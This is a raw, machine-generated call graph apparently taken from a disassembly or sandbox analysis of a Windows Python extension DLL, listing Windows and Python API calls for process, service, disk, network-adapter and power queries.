7ffb9dd6a1e2 RtlLookupFunctionEntry 3248->3249 3250 7ffb9dd6a11f 3249->3250 3251 7ffb9dd6a1f8 RtlVirtualUnwind 3249->3251 3252 7ffb9dd6a0c0 SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 3250->3252 3251->3249 3251->3250 3704 7ffb9dd67590 PyArg_ParseTuple 3705 7ffb9dd6782c 3704->3705 3706 7ffb9dd675bb 3704->3706 3710 7ffb9dd67480 malloc 3706->3710 3708 7ffb9dd67711 Py_BuildValue free 3711 7ffb9dd67501 PyErr_NoMemory 3710->3711 3712 7ffb9dd674b7 3710->3712 3714 7ffb9dd67507 3711->3714 3713 7ffb9dd674c0 NtQuerySystemInformation 3712->3713 3715 7ffb9dd674e6 free malloc 3712->3715 3716 7ffb9dd6751f 3712->3716 3713->3712 3713->3715 3714->3705 3714->3708 3715->3711 3715->3713 3717 7ffb9dd6753c 3716->3717 3718 7ffb9dd67523 3716->3718 3717->3714 3721 7ffb9dd610e0 12 API calls 3717->3721 3719 7ffb9dd61350 11 API calls 3718->3719 3720 7ffb9dd67531 free 3719->3720 3720->3714 3722 7ffb9dd67575 free 3721->3722 3722->3714 3723 7ffb9dd67090 PyArg_ParseTupleAndKeywords 3724 7ffb9dd670e1 3723->3724 3725 7ffb9dd6728d 3723->3725 3726 7ffb9dd67279 Py_BuildValue 3724->3726 3727 7ffb9dd670f4 3724->3727 3755 7ffb9dd67d20 3727->3755 3730 7ffb9dd67110 3730->3725 3734 7ffb9dd67133 3730->3734 3735 7ffb9dd67146 3730->3735 3731 7ffb9dd670fd 3732 7ffb9dd610e0 12 API calls 3731->3732 3733 7ffb9dd67109 3732->3733 3764 7ffb9dd66ae0 3734->3764 3808 7ffb9dd66e80 3735->3808 3738 7ffb9dd67144 3739 7ffb9dd67196 3738->3739 3740 7ffb9dd67174 CommandLineToArgvW 3738->3740 3741 7ffb9dd6724d 3739->3741 3742 7ffb9dd67244 free 3739->3742 3743 7ffb9dd6719b PyList_New 3740->3743 3744 7ffb9dd6718a 3740->3744 3746 7ffb9dd67261 3741->3746 3750 7ffb9dd67258 _Py_Dealloc 3741->3750 3742->3741 3745 7ffb9dd67236 LocalFree 3743->3745 3752 7ffb9dd671b2 3743->3752 3747 7ffb9dd61070 11 API calls 3744->3747 3745->3739 3748 7ffb9dd67218 3746->3748 3751 7ffb9dd6726c _Py_Dealloc 3746->3751 3747->3739 3749 7ffb9dd67203 LocalFree free 3749->3748 3750->3746 3751->3748 3752->3749 3753 7ffb9dd671da PyUnicode_FromWideChar 3752->3753 3753->3745 3754 7ffb9dd671e8 PyList_SetItem 3753->3754 3754->3749 3754->3752 3756 7ffb9dd67d2c OpenProcess 3755->3756 3757 7ffb9dd670f9 3755->3757 3758 7ffb9dd67d41 3756->3758 3759 7ffb9dd67d6c PyErr_Clear 3756->3759 3757->3730 3757->3731 3760 7ffb9dd67a40 45 API calls 3758->3760 3761 7ffb9dd67d4b 3760->3761 3762 7ffb9dd67d50 CloseHandle 3761->3762 3763 7ffb9dd67d64 CloseHandle 3761->3763 3762->3757 3763->3759 3765 7ffb9dd66b37 OpenProcess 3764->3765 3766 7ffb9dd66b29 3764->3766 3768 7ffb9dd66b6f 3765->3768 3769 7ffb9dd66b4f GetLastError 3765->3769 3767 7ffb9dd61180 12 API calls 3766->3767 3770 7ffb9dd66b35 3767->3770 3772 7ffb9dd67a40 45 API calls 3768->3772 3769->3768 3771 7ffb9dd66b5a 3769->3771 3774 7ffb9dd66b66 3770->3774 3775 7ffb9dd66b85 NtQueryInformationProcess 3770->3775 3773 7ffb9dd61070 11 API calls 3771->3773 3772->3770 3773->3774 3780 7ffb9dd6a0a0 8 API calls 3774->3780 3776 7ffb9dd66bfb 3775->3776 3777 7ffb9dd66ba6 3775->3777 3778 7ffb9dd66c11 ReadProcessMemory 3776->3778 3779 7ffb9dd66c98 NtQueryInformationProcess 3776->3779 3781 7ffb9dd66bbb RtlNtStatusToDosErrorNoTeb 3777->3781 3782 7ffb9dd66bb6 3777->3782 3785 7ffb9dd66c45 ReadProcessMemory 3778->3785 3786 7ffb9dd66c25 GetLastError 3778->3786 3783 7ffb9dd66cd0 ReadProcessMemory 3779->3783 3784 7ffb9dd66caf 3779->3784 3787 7ffb9dd66e56 3780->3787 3781->3782 3789 7ffb9dd61010 __stdio_common_vsprintf 3782->3789 3783->3786 3790 7ffb9dd66cf5 ReadProcessMemory 3783->3790 3788 7ffb9dd61350 11 API calls 3784->3788 3785->3786 3794 7ffb9dd66c64 3785->3794 3840 7ffb9dd66980 3786->3840 3787->3738 3792 7ffb9dd66cbd CloseHandle 3788->3792 3793 7ffb9dd66bdc PyErr_SetFromWindowsErrWithFilename CloseHandle 3789->3793 3790->3786 3790->3794 3792->3774 3793->3774 3799 7ffb9dd66c80 calloc 3794->3799 3802 7ffb9dd66d47 VirtualQueryEx 3794->3802 3795 7ffb9dd66c32 CloseHandle 3795->3774 3797 7ffb9dd66ddf PyErr_NoMemory CloseHandle 3797->3774 3798 7ffb9dd66df4 ReadProcessMemory 3800 7ffb9dd66e0f GetLastError 3798->3800 3801 7ffb9dd66e35 CloseHandle 3798->3801 3799->3797 3799->3798 3803 7ffb9dd66980 18 API calls 3800->3803 3801->3774 3802->3799 3804 7ffb9dd66d63 GetLastError 3802->3804 3805 7ffb9dd66e1c CloseHandle free 3803->3805 3806 7ffb9dd61010 __stdio_common_vsprintf 3804->3806 3805->3774 3807 7ffb9dd66d82 PyErr_SetFromWindowsErrWithFilename CloseHandle 3806->3807 3807->3774 3809 7ffb9dd66eb1 PyErr_SetString 3808->3809 3810 7ffb9dd66ee6 3808->3810 3811 7ffb9dd66ec8 3809->3811 3812 7ffb9dd66ef8 OpenProcess 3810->3812 3813 7ffb9dd66eea 3810->3813 3811->3738 3815 7ffb9dd66f10 GetLastError 3812->3815 3816 7ffb9dd66f29 3812->3816 3814 7ffb9dd61180 12 API calls 3813->3814 3817 7ffb9dd66ef6 3814->3817 3815->3816 3818 7ffb9dd66f1b 3815->3818 3819 7ffb9dd67a40 45 API calls 3816->3819 3817->3811 3821 7ffb9dd66f3b NtQueryInformationProcess 3817->3821 3820 7ffb9dd61070 11 API calls 3818->3820 3819->3817 3820->3811 3822 7ffb9dd66f5f 3821->3822 3824 7ffb9dd66f79 3821->3824 3823 7ffb9dd61180 12 API calls 3822->3823 3826 7ffb9dd66f6b CloseHandle 3823->3826 3825 7ffb9dd66faa calloc 3824->3825 3829 7ffb9dd66f8e 3824->3829 3827 7ffb9dd66fc1 PyErr_NoMemory CloseHandle 3825->3827 3828 7ffb9dd66fd5 NtQueryInformationProcess 3825->3828 3826->3811 3827->3811 3830 7ffb9dd67009 calloc 3828->3830 3831 7ffb9dd66ff9 3828->3831 3832 7ffb9dd61350 11 API calls 3829->3832 3837 7ffb9dd67037 PyErr_NoMemory 3830->3837 3838 7ffb9dd67054 wcscpy_s free CloseHandle 3830->3838 3833 7ffb9dd61350 11 API calls 3831->3833 3835 7ffb9dd66f9c CloseHandle 3832->3835 3836 7ffb9dd67007 3833->3836 3835->3811 3839 7ffb9dd6703d free CloseHandle 3836->3839 3837->3839 3838->3811 3839->3811 3841 7ffb9dd6698a 3840->3841 3842 7ffb9dd669ab 3841->3842 3843 7ffb9dd66ab8 3841->3843 3844 7ffb9dd61010 __stdio_common_vsprintf 3842->3844 3845 7ffb9dd61070 11 API calls 3843->3845 3846 7ffb9dd669ce 3844->3846 3847 7ffb9dd66ac4 3845->3847 3848 7ffb9dd669d7 __acrt_iob_func 3846->3848 3849 7ffb9dd66a33 3846->3849 3850 7ffb9dd6a0a0 8 API calls 3847->3850 3852 7ffb9dd61d70 fprintf __stdio_common_vfprintf 3848->3852 3851 7ffb9dd61010 __stdio_common_vsprintf 3849->3851 3853 7ffb9dd66ad4 3850->3853 3854 7ffb9dd66a4c PyObject_CallFunction PyErr_SetObject 3851->3854 3855 7ffb9dd669fe __acrt_iob_func 3852->3855 3853->3795 3856 7ffb9dd66a98 3854->3856 3857 7ffb9dd66a89 3854->3857 3858 7ffb9dd61d70 fprintf __stdio_common_vfprintf 3855->3858 3861 7ffb9dd6a0a0 8 API calls 3856->3861 3857->3856 3860 7ffb9dd66a8f _Py_Dealloc 3857->3860 3859 7ffb9dd66a19 __acrt_iob_func 3858->3859 3862 7ffb9dd61d70 fprintf __stdio_common_vfprintf 3859->3862 3860->3856 3863 7ffb9dd66ab0 3861->3863 3862->3849 3863->3795 3864 7ffb9dd66290 GetProcessHeap HeapAlloc 3865 7ffb9dd662db GetFileType 3864->3865 3866 7ffb9dd663a3 PyErr_NoMemory 3864->3866 3869 7ffb9dd662e9 SetLastError 3865->3869 3870 7ffb9dd66304 3865->3870 3867 7ffb9dd662fd 3866->3867 3868 7ffb9dd663b3 GetProcessHeap HeapFree 3866->3868 3868->3867 3869->3867 3871 7ffb9dd66310 NtQueryObject 3870->3871 3872 7ffb9dd66347 GetProcessHeap HeapFree GetProcessHeap HeapAlloc 3870->3872 3873 7ffb9dd6638b 3870->3873 3871->3870 3871->3872 3872->3866 3872->3870 3873->3867 3874 7ffb9dd61350 11 API calls 3873->3874 3875 7ffb9dd663a1 3874->3875 3875->3868 3876 7ffb9dd68b10 PyArg_ParseTuple 3877 7ffb9dd68b2d 3876->3877 3878 7ffb9dd68b34 3876->3878 3887 7ffb9dd680f0 OpenSCManagerA 3878->3887 3881 7ffb9dd68b7d 3882 7ffb9dd68b56 StartServiceA 3883 7ffb9dd68b89 CloseServiceHandle 3882->3883 3884 7ffb9dd68b68 3882->3884 3885 7ffb9dd61070 11 API calls 3884->3885 3886 7ffb9dd68b74 CloseServiceHandle 3885->3886 3886->3881 3888 7ffb9dd68159 OpenServiceA 3887->3888 3889 7ffb9dd68128 GetLastError 3887->3889 3891 7ffb9dd68170 GetLastError 3888->3891 3892 7ffb9dd681aa CloseServiceHandle 3888->3892 3890 7ffb9dd61010 __stdio_common_vsprintf 3889->3890 3894 7ffb9dd68148 PyErr_SetFromWindowsErrWithFilename 3890->3894 3895 7ffb9dd61010 __stdio_common_vsprintf 3891->3895 3893 7ffb9dd681b6 3892->3893 3896 7ffb9dd6a0a0 8 API calls 3893->3896 3894->3893 3897 7ffb9dd68190 PyErr_SetFromWindowsErrWithFilename CloseServiceHandle 3895->3897 3898 7ffb9dd681c6 3896->3898 3897->3893 3898->3881 3898->3882 3950 7ffb9dd63318 PyArg_ParseTuple 3951 7ffb9dd63380 memset QueryDosDeviceA 3950->3951 3952 7ffb9dd63376 3950->3952 3953 7ffb9dd633b7 3951->3953 3954 7ffb9dd6a0a0 8 API calls 3952->3954 3953->3951 3955 7ffb9dd633e2 Py_BuildValue 3953->3955 3958 7ffb9dd6340f 3953->3958 3957 7ffb9dd63406 3954->3957 3955->3952 3959 7ffb9dd629d0 swprintf_s __stdio_common_vsprintf_s 3958->3959 3959->3955 3990 7ffb9dd6af1a __scrt_dllmain_exception_filter 4012 7ffb9dd61260 PyArg_ParseTuple 4013 7ffb9dd6128c 4012->4013 4014 7ffb9dd6127d PyObject_IsTrue 4012->4014 4014->4013 4015 7ffb9dd64260 PyArg_ParseTuple 4016 7ffb9dd6427f 4015->4016 4017 7ffb9dd642d4 4015->4017 4018 7ffb9dd64287 4016->4018 4019 7ffb9dd64299 4016->4019 4020 7ffb9dd61180 12 API calls 4018->4020 4029 7ffb9dd67ca0 4019->4029 4022 7ffb9dd64293 4020->4022 4024 7ffb9dd642ab TerminateProcess 4025 7ffb9dd642dc CloseHandle 4024->4025 4026 7ffb9dd642bd GetLastError 4024->4026 4026->4025 4027 7ffb9dd642c8 4026->4027 4028 7ffb9dd61070 11 API calls 4027->4028 4028->4017 4030 7ffb9dd67cbf OpenProcess 4029->4030 4031 7ffb9dd67cae 4029->4031 4032 7ffb9dd67cfd 4030->4032 4033 7ffb9dd67cd9 GetLastError 4030->4033 4031->4030 4033->4032 4034 7ffb9dd67ce4 4033->4034 4035 7ffb9dd61070 11 API calls 4034->4035 4036 7ffb9dd642a3 4035->4036 4036->4017 4036->4024 4037 7ffb9dd65760 PyArg_ParseTuple 4038 7ffb9dd657c8 4037->4038 4039 7ffb9dd65783 4037->4039 4040 7ffb9dd6578b 4039->4040 4041 7ffb9dd65799 OpenProcess 4039->4041 4042 7ffb9dd61180 12 API calls 4040->4042 4043 7ffb9dd657b1 GetLastError 4041->4043 4044 7ffb9dd657d5 4041->4044 4046 7ffb9dd65797 4042->4046 4043->4044 4047 7ffb9dd657bc 4043->4047 4045 7ffb9dd67a40 45 API calls 4044->4045 4045->4046 4046->4038 4049 7ffb9dd657e7 NtQueryInformationProcess CloseHandle 4046->4049 4048 7ffb9dd61070 11 API calls 4047->4048 4048->4038 4050 7ffb9dd65830 Py_BuildValue 4049->4050 4051 7ffb9dd65817 4049->4051 4052 7ffb9dd61350 11 API calls 4051->4052 4053 7ffb9dd65825 4052->4053 4054 7ffb9dd65a60 PyArg_ParseTuple 4055 7ffb9dd65ac8 4054->4055 4056 7ffb9dd65a83 4054->4056 4057 7ffb9dd65a8b 4056->4057 4058 7ffb9dd65a99 OpenProcess 4056->4058 4059 7ffb9dd61180 12 API calls 4057->4059 4060 7ffb9dd65ab1 GetLastError 4058->4060 4061 7ffb9dd65ad5 4058->4061 4063 7ffb9dd65a97 4059->4063 4060->4061 4064 7ffb9dd65abc 4060->4064 4062 7ffb9dd67a40 45 API calls 4061->4062 4062->4063 4063->4055 4066 7ffb9dd65ae7 GetProcessAffinityMask 4063->4066 4065 7ffb9dd61070 11 API calls 4064->4065 4065->4055 4067 7ffb9dd65b1c CloseHandle Py_BuildValue 4066->4067 4068 7ffb9dd65afe PyErr_SetFromWindowsErr CloseHandle 4066->4068 4069 7ffb9dd631e1 4070 7ffb9dd63227 strcat_s Py_BuildValue 4069->4070 4071 7ffb9dd632b4 SetErrorMode 4070->4071 4072 7ffb9dd63265 PyList_Append 4070->4072 4073 7ffb9dd632c2 4071->4073 4074 7ffb9dd632d1 4071->4074 4072->4071 4091 7ffb9dd62fb3 4072->4091 4073->4074 4075 7ffb9dd632c8 _Py_Dealloc 4073->4075 4076 7ffb9dd632e0 4074->4076 4077 7ffb9dd632d7 _Py_Dealloc 4074->4077 4075->4074 4083 7ffb9dd6a0a0 8 API calls 4076->4083 4077->4076 4078 7ffb9dd6327b _Py_Dealloc 4079 7ffb9dd63284 strchr 4078->4079 4080 7ffb9dd62f80 PyEval_SaveThread GetDriveTypeA PyEval_RestoreThread 4079->4080 4081 7ffb9dd6329d SetErrorMode 4079->4081 4082 7ffb9dd62fe9 GetVolumeInformationA 4080->4082 4080->4091 4081->4076 4084 7ffb9dd63031 strcat_s SetLastError 4082->4084 4082->4091 4086 7ffb9dd63309 4083->4086 4084->4091 4085 7ffb9dd63063 strcat_s 4087 7ffb9dd63073 strcat_s 4085->4087 4085->4091 4087->4091 4088 7ffb9dd63096 strcat_s 4088->4091 4089 7ffb9dd631b0 strcat_s 4089->4091 4090 7ffb9dd630bb FindFirstVolumeMountPointA 4090->4091 4091->4070 4091->4078 4091->4079 4091->4082 4091->4085 4091->4088 4091->4089 4091->4090 4092 7ffb9dd630e0 strcpy_s strcat_s Py_BuildValue 4091->4092 4093 7ffb9dd63142 PyList_Append 4092->4093 4094 7ffb9dd632ab FindVolumeMountPointClose 4092->4094 4093->4094 4095 7ffb9dd63157 4093->4095 4094->4071 4096 7ffb9dd6315d _Py_Dealloc 4095->4096 4097 7ffb9dd63166 FindNextVolumeMountPointA 4095->4097 4096->4097 4097->4092 4098 7ffb9dd63184 FindVolumeMountPointClose 4097->4098 4098->4091 4099 7ffb9dd681e0 PyList_New 4100 7ffb9dd68223 OpenSCManagerA 4099->4100 4127 7ffb9dd6842d 4099->4127 4101 7ffb9dd6827d EnumServicesStatusExW 4100->4101 4102 7ffb9dd68249 GetLastError 4100->4102 4105 7ffb9dd682c8 GetLastError 4101->4105 4115 7ffb9dd68335 4101->4115 4104 7ffb9dd61010 __stdio_common_vsprintf 4102->4104 4103 7ffb9dd6a0a0 8 API calls 4106 7ffb9dd6845d 4103->4106 4107 7ffb9dd68269 PyErr_SetFromWindowsErrWithFilename 4104->4107 4108 7ffb9dd682d5 4105->4108 4105->4115 4107->4127 4110 7ffb9dd682da free 4108->4110 4111 7ffb9dd682e3 malloc EnumServicesStatusExW 4108->4111 4109 7ffb9dd68418 CloseServiceHandle free 4109->4127 4110->4111 4111->4105 4111->4115 4112 7ffb9dd6836b PyUnicode_FromWideChar 4113 7ffb9dd6846b 4112->4113 4112->4115 4114 7ffb9dd68471 _Py_Dealloc 4113->4114 4116 7ffb9dd6847a 4113->4116 4114->4116 4115->4109 4115->4112 4115->4115 4118 7ffb9dd6839a PyUnicode_FromWideChar 4115->4118 4128 7ffb9dd683e5 _Py_Dealloc 4115->4128 4129 7ffb9dd683f4 _Py_Dealloc 4115->4129 4130 7ffb9dd68403 _Py_Dealloc 4115->4130 4117 7ffb9dd6848e 4116->4117 4120 7ffb9dd68485 _Py_Dealloc 4116->4120 4121 7ffb9dd684a2 4117->4121 4123 7ffb9dd68499 _Py_Dealloc 4117->4123 4118->4113 4119 7ffb9dd683ac Py_BuildValue 4118->4119 4119->4113 4122 7ffb9dd683cb PyList_Append 4119->4122 4120->4117 4124 7ffb9dd684b2 CloseServiceHandle 4121->4124 4125 7ffb9dd684a9 _Py_Dealloc 4121->4125 4122->4113 4122->4115 4123->4121 4126 7ffb9dd684c0 free 4124->4126 4124->4127 4125->4124 4126->4127 4127->4103 4128->4115 4129->4115 4130->4115 4173 7ffb9dd66069 PyDict_New memset 4174 7ffb9dd66147 CreateToolhelp32Snapshot 4173->4174 4177 7ffb9dd66172 4173->4177 4175 7ffb9dd6615b PyErr_SetFromWindowsErr 4174->4175 4176 7ffb9dd66179 Process32First 4174->4176 4175->4177 4179 7ffb9dd66169 _Py_Dealloc 4175->4179 4180 7ffb9dd6620f CloseHandle 4176->4180 4181 7ffb9dd6619b 4176->4181 4178 7ffb9dd6a0a0 8 API calls 4177->4178 4182 7ffb9dd6623b 4178->4182 4179->4177 4180->4177 4183 7ffb9dd661a0 PyLong_FromLong 4181->4183 4184 7ffb9dd6626f 4183->4184 4185 7ffb9dd661b6 PyLong_FromLong 4183->4185 4188 7ffb9dd6627e CloseHandle 4184->4188 4189 7ffb9dd66275 _Py_Dealloc 4184->4189 4186 7ffb9dd6624c 4185->4186 4187 7ffb9dd661cc PyDict_SetItem 4185->4187 4190 7ffb9dd66252 _Py_Dealloc 4186->4190 4191 7ffb9dd6625b 4186->4191 4187->4186 4192 7ffb9dd661df 4187->4192 4188->4177 4189->4188 4190->4191 4191->4184 4194 7ffb9dd66266 _Py_Dealloc 4191->4194 4193 7ffb9dd661e5 _Py_Dealloc 4192->4193 4195 7ffb9dd661fd Process32Next 4192->4195 4196 7ffb9dd661f4 _Py_Dealloc 4192->4196 4193->4192 4194->4184 4195->4180 4195->4183 4196->4195 4197 7ffb9dd68964 PyArg_ParseTuple 4198 7ffb9dd6899d 4197->4198 4199 7ffb9dd689a4 4197->4199 4200 7ffb9dd680f0 17 API calls 4199->4200 4201 7ffb9dd689c6 4200->4201 4202 7ffb9dd689d2 QueryServiceConfig2W GetLastError 4201->4202 4203 7ffb9dd68af6 4201->4203 4204 7ffb9dd68a35 GetLastError 4202->4204 4205 7ffb9dd68a04 CloseServiceHandle Py_BuildValue 4202->4205 4206 7ffb9dd68ae1 4204->4206 4207 7ffb9dd68a44 malloc QueryServiceConfig2W 4204->4207 4209 7ffb9dd61070 11 API calls 4206->4209 4207->4206 4208 7ffb9dd68a75 4207->4208 4211 7ffb9dd68a7d Py_BuildValue 4208->4211 4212 7ffb9dd68a93 PyUnicode_FromWideChar 4208->4212 4210 7ffb9dd68aed CloseServiceHandle 4209->4210 4210->4203 4213 7ffb9dd68ab0 4211->4213 4212->4213 4213->4210 4215 7ffb9dd68ab8 free CloseServiceHandle 4213->4215 4216 7ffb9dd62e70 memset PyList_New 4217 7ffb9dd62ed2 SetErrorMode PyArg_ParseTuple 4216->4217 4218 7ffb9dd632e0 4216->4218 4219 7ffb9dd632b4 SetErrorMode 4217->4219 4220 7ffb9dd62f15 PyObject_IsTrue PyEval_SaveThread GetLogicalDriveStringsA PyEval_RestoreThread 4217->4220 4221 7ffb9dd6a0a0 8 API calls 4218->4221 4222 7ffb9dd632c2 4219->4222 4223 7ffb9dd632d1 4219->4223 4224 7ffb9dd62f4d PyErr_SetFromWindowsErr SetErrorMode 4220->4224 4243 7ffb9dd62f63 4220->4243 4225 7ffb9dd63309 4221->4225 4222->4223 4226 7ffb9dd632c8 _Py_Dealloc 4222->4226 4223->4218 4227 7ffb9dd632d7 _Py_Dealloc 4223->4227 4224->4223 4226->4223 4227->4218 4228 7ffb9dd6329d SetErrorMode 4228->4218 4229 7ffb9dd62f80 PyEval_SaveThread GetDriveTypeA PyEval_RestoreThread 4230 7ffb9dd62fe9 GetVolumeInformationA 4229->4230 4229->4243 4231 7ffb9dd63031 strcat_s SetLastError 4230->4231 4230->4243 4231->4243 4232 7ffb9dd63063 strcat_s 4234 7ffb9dd63073 strcat_s 4232->4234 4232->4243 4233 7ffb9dd63284 strchr 4233->4228 4233->4229 4234->4243 4235 7ffb9dd63096 strcat_s 4235->4243 4236 7ffb9dd631b0 strcat_s 4236->4243 4237 7ffb9dd630bb FindFirstVolumeMountPointA 4237->4243 4238 7ffb9dd63227 strcat_s Py_BuildValue 4238->4219 4240 7ffb9dd63265 PyList_Append 4238->4240 4239 7ffb9dd630e0 strcpy_s strcat_s Py_BuildValue 4241 7ffb9dd63142 PyList_Append 4239->4241 4242 7ffb9dd632ab FindVolumeMountPointClose 4239->4242 4240->4219 4240->4243 4241->4242 4244 7ffb9dd63157 4241->4244 4242->4219 4243->4228 4243->4229 4243->4230 4243->4232 4243->4233 4243->4235 4243->4236 4243->4237 4243->4238 4243->4239 4245 7ffb9dd6327b _Py_Dealloc 4243->4245 4246 7ffb9dd6315d _Py_Dealloc 4244->4246 4247 7ffb9dd63166 FindNextVolumeMountPointA 4244->4247 4245->4233 4246->4247 4247->4239 4248 7ffb9dd63184 FindVolumeMountPointClose 4247->4248 4248->4243 4249 7ffb9dd61870 PyModule_GetState 4250 7ffb9dd6188b PyModule_GetState 4249->4250 4251 7ffb9dd618aa 4249->4251 4250->4251 4252 7ffb9dd618a1 _Py_Dealloc 4250->4252 4252->4251 4253 7ffb9dd63970 PyList_New 4254 7ffb9dd639b2 4253->4254 4255 7ffb9dd63d7c 4253->4255 4292 7ffb9dd63670 GetAdaptersAddresses 4254->4292 4257 7ffb9dd6a0a0 8 API calls 4255->4257 4258 7ffb9dd63da6 4257->4258 4259 7ffb9dd63d1c 4260 7ffb9dd63d2c 4259->4260 4261 7ffb9dd63d23 _Py_Dealloc 4259->4261 4262 7ffb9dd63d40 4260->4262 4263 7ffb9dd63d37 _Py_Dealloc 4260->4263 4261->4260 4265 7ffb9dd63d54 4262->4265 4267 7ffb9dd63d4b _Py_Dealloc 4262->4267 4263->4262 4264 7ffb9dd63a1a PyUnicode_FromWideChar 4266 7ffb9dd63d11 free 4264->4266 4283 7ffb9dd639cf 4264->4283 4268 7ffb9dd63d68 4265->4268 4269 7ffb9dd63d5f _Py_Dealloc 4265->4269 4266->4259 4267->4265 4268->4255 4270 7ffb9dd63d73 _Py_Dealloc 4268->4270 4269->4268 4270->4255 4271 7ffb9dd63a96 Py_BuildValue 4272 7ffb9dd63d0c 4271->4272 4273 7ffb9dd63abc Py_BuildValue 4271->4273 4272->4266 4273->4272 4277 7ffb9dd63b13 PyList_Append 4273->4277 4274 7ffb9dd63b5d inet_ntop 4274->4272 4278 7ffb9dd63b84 ConvertLengthToIpv4Mask 4274->4278 4275 7ffb9dd63ce4 _Py_Dealloc 4275->4283 4276 7ffb9dd63cfa free 4276->4255 4277->4272 4277->4283 4281 7ffb9dd63bf0 PyUnicode_FromString 4278->4281 4282 7ffb9dd63b98 inet_ntop 4278->4282 4279 7ffb9dd63bc9 inet_ntop 4279->4283 4280 7ffb9dd629d0 swprintf_s __stdio_common_vsprintf_s 4280->4283 4281->4272 4281->4283 4282->4283 4283->4259 4283->4264 4283->4271 4283->4272 4283->4274 4283->4275 4283->4276 4283->4279 4283->4280 4283->4281 4284 7ffb9dd63b2f _Py_Dealloc 4283->4284 4285 7ffb9dd63c11 PyUnicode_FromString 4283->4285 4286 7ffb9dd63b3f _Py_Dealloc 4283->4286 4287 7ffb9dd63c40 Py_BuildValue 4283->4287 4289 7ffb9dd63ca0 _Py_Dealloc 4283->4289 4290 7ffb9dd63caf _Py_Dealloc 4283->4290 4291 7ffb9dd63cc8 _Py_Dealloc 4283->4291 4284->4283 4285->4287 4286->4283 4287->4266 4288 7ffb9dd63c8a PyList_Append 4287->4288 4288->4266 4288->4283 4289->4283 4290->4283 4291->4283 4293 7ffb9dd6369b PyErr_SetString 4292->4293 4294 7ffb9dd636b9 malloc 4292->4294 4293->4283 4295 7ffb9dd636d0 PyErr_NoMemory 4294->4295 4296 7ffb9dd636e2 memset GetAdaptersAddresses 4294->4296 4295->4283 4297 7ffb9dd6370f free PyErr_SetString 4296->4297 4298 7ffb9dd6373b 4296->4298 4297->4283 4298->4283 4299 7ffb9dd64170 PyList_New 4300 7ffb9dd6418c 4299->4300 4301 7ffb9dd64186 4299->4301 4315 7ffb9dd67840 4300->4315 4303 7ffb9dd64220 4304 7ffb9dd6422f 4303->4304 4305 7ffb9dd64226 _Py_Dealloc 4303->4305 4307 7ffb9dd6423d 4304->4307 4308 7ffb9dd64234 free 4304->4308 4305->4304 4306 7ffb9dd641fd free 4306->4307 4308->4307 4309 7ffb9dd641c0 PyLong_FromLong 4309->4303 4310 7ffb9dd641d2 PyList_Append 4309->4310 4311 7ffb9dd6420b 4310->4311 4312 7ffb9dd641aa 4310->4312 4311->4303 4314 7ffb9dd64217 _Py_Dealloc 4311->4314 4312->4303 4312->4306 4312->4309 4313 7ffb9dd641ee _Py_Dealloc 4312->4313 4313->4312 4314->4303 4320 7ffb9dd67860 4315->4320 4316 7ffb9dd6786b free 4317 7ffb9dd67874 malloc 4316->4317 4318 7ffb9dd6788b EnumProcesses 4317->4318 4319 7ffb9dd678cd PyErr_NoMemory 4317->4319 4318->4320 4321 7ffb9dd678ba free PyErr_SetFromWindowsErr 4318->4321 4322 7ffb9dd678af 4319->4322 4320->4316 4320->4317 4320->4322 4321->4322 4322->4312 4323 7ffb9dd68070 GetSystemPowerStatus 4324 7ffb9dd68092 PyErr_SetFromWindowsErr 4323->4324 4325 7ffb9dd680ae Py_BuildValue 4323->4325 4327 7ffb9dd6a0a0 8 API calls 4324->4327 4326 7ffb9dd6a0a0 8 API calls 4325->4326 4328 7ffb9dd680e1 4326->4328 4329 7ffb9dd680a9 4327->4329 4330 7ffb9dd644f0 PyArg_ParseTuple 4331 7ffb9dd64558 4330->4331 4332 7ffb9dd64513 4330->4332 4333 7ffb9dd6451b 4332->4333 4334 7ffb9dd64529 OpenProcess 4332->4334 4337 7ffb9dd61180 12 API calls 4333->4337 4335 7ffb9dd64541 GetLastError 4334->4335 4336 7ffb9dd64565 4334->4336 4335->4336 4338 7ffb9dd6454c 4335->4338 4339 7ffb9dd67a40 45 API calls 4336->4339 4341 7ffb9dd64527 4337->4341 4340 7ffb9dd61070 11 API calls 4338->4340 4339->4341 4340->4331 4341->4331 4342 7ffb9dd64577 GetProcessTimes 4341->4342 4343 7ffb9dd6459d GetLastError 4342->4343 4344 7ffb9dd645e8 CloseHandle 4342->4344 4345 7ffb9dd645a8 4343->4345 4346 7ffb9dd645ca PyErr_SetFromWindowsErr CloseHandle 4343->4346 4347 7ffb9dd64612 Py_BuildValue 4344->4347 4349 7ffb9dd610e0 12 API calls 4345->4349 4350 7ffb9dd645b4 CloseHandle 4349->4350 4351 7ffb9dd650f0 PyArg_ParseTuple 4352 7ffb9dd65158 4351->4352 4353 7ffb9dd65113 4351->4353 4354 7ffb9dd6511b 4353->4354 4355 7ffb9dd65129 OpenProcess 4353->4355 4356 7ffb9dd61180 12 API calls 4354->4356 4357 7ffb9dd65141 GetLastError 4355->4357 4358 7ffb9dd65165 4355->4358 4360 7ffb9dd65127 4356->4360 4357->4358 4361 7ffb9dd6514c 4357->4361 4359 7ffb9dd67a40 45 API calls 4358->4359 4359->4360 4360->4352 4365 7ffb9dd66640 PyList_New 4360->4365 4362 7ffb9dd61070 11 API calls 4361->4362 4362->4352 4366 7ffb9dd66677 EnterCriticalSection GetProcessHeap HeapAlloc 4365->4366 4391 7ffb9dd65183 CloseHandle 4365->4391 4367 7ffb9dd666b8 PyErr_NoMemory 4366->4367 4368 7ffb9dd666d5 NtQuerySystemInformation 4366->4368 4369 7ffb9dd666be 4367->4369 4370 7ffb9dd666ef 4368->4370 4371 7ffb9dd66749 4368->4371 4372 7ffb9dd666c4 _Py_Dealloc 4369->4372 4384 7ffb9dd666cd 4369->4384 4373 7ffb9dd666f0 GetProcessHeap HeapFree 4370->4373 4374 7ffb9dd6674d 4371->4374 4396 7ffb9dd66790 4371->4396 4372->4384 4375 7ffb9dd66710 GetProcessHeap HeapAlloc 4373->4375 4376 7ffb9dd66774 PyErr_SetString 4373->4376 4377 7ffb9dd61350 11 API calls 4374->4377 4375->4367 4380 7ffb9dd6672f NtQuerySystemInformation 4375->4380 4376->4369 4381 7ffb9dd6675b GetProcessHeap HeapFree 4377->4381 4378 7ffb9dd668eb 4383 7ffb9dd668f5 GetProcessHeap HeapFree 4378->4383 4386 7ffb9dd66918 4378->4386 4379 7ffb9dd668e5 CloseHandle 4379->4378 4380->4371 4380->4373 4381->4369 4382 7ffb9dd667b3 GetCurrentProcess DuplicateHandle 